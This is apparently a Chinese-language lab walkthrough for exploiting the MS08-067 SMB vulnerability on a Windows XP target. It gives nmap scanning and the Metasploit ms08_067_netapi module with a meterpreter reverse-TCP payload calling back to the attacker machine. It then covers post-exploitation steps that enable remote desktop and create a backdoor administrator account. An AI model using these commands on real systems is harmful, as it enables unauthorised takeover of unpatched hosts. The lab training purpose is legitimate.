漏洞概要
MS-08-067是Windows平台中smb
服務445端口的遠程代碼執行漏洞
利用成功可以遠程控制主機
影響范圍為:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
實驗場景
攻擊機:kali2022
msfconsole利用
靶機:windows xp
漏洞利用
使用ifconfig
和ipconfig
獲取攻擊機和靶機的IP地址
攻擊機IP:172.16.1.117
靶機IP:172.16.1.116
nmap的默認腳本在/usr/share/nmap/scripts
,ls -l| grep 08-67
篩選漏洞相關模塊
使用nmap
的漏洞掃描腳本smb-vuln-ms08-067
掃描靶機是否存在ms-08-067
漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n
發現存在漏洞,使用msfconsole
進行利用
msfconsole啟動漏洞平台
查找漏洞利用腳本
search ms08_067
使用漏洞利用模塊,並使用show options
查看漏洞利用模塊配置參數
use exploit/windows/smb/ms08_067_netapi
show options
Required
為yes
是必須要設置的參數
在最新版kali
中,對常見的漏洞自動選擇了合適的payload,例如這里的windows/meterpreter/reverse_tcp
,並且配置自動配置了反彈會話的IP地址和端口
就是我們本機的IP和端口
如果不是這個payload
需要我們手動設置
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444
觀察我們必須設置目標的IP地址,就是RHOSTS
,這里如果是RHOST
是只可以設置一個IP地址,如果是RHOSTS
則可以設置一個網段,對一個網段進行攻擊
設置目標IP
set RHOSTS 172.16.1.116
這里端口默認就是445端口,不在改變
這里有一個target
可以設置,target是用來指定靶機操作系統類型的,指定的准確的話,跟容易利用成功
show targets
可以查看可以設置的target
這里有很多taret,我么使用target代號為34的
set target 34
設置完成后,可以使用check
命令查看靶機是否存在這個漏洞,check
只有在一些常見的漏洞中可以使用
存在漏洞,使用命令exploit
或者run
進行漏洞利用
利用成功,成功獲取靶機會話,並且權限為SYTEM
最高權限
后面我們可以開啟靶機的3389端口,進行遠程桌面連接
使用run getgui -e
開啟靶機3389端口
netstat查看靶機3389端口是否開放
創建hacker
用戶,並加入到Aministrators
默認管理員組
net user hacker 123456 /add
net localgroup Aministrators hacker /add
最后可以使用net user hacker
查看是否已經加入到管理員組
打開一個新的終端,連接靶機遠程桌面
rdesktop -u hacker -p 123456 172.16.1.116
成功獲取靶機權限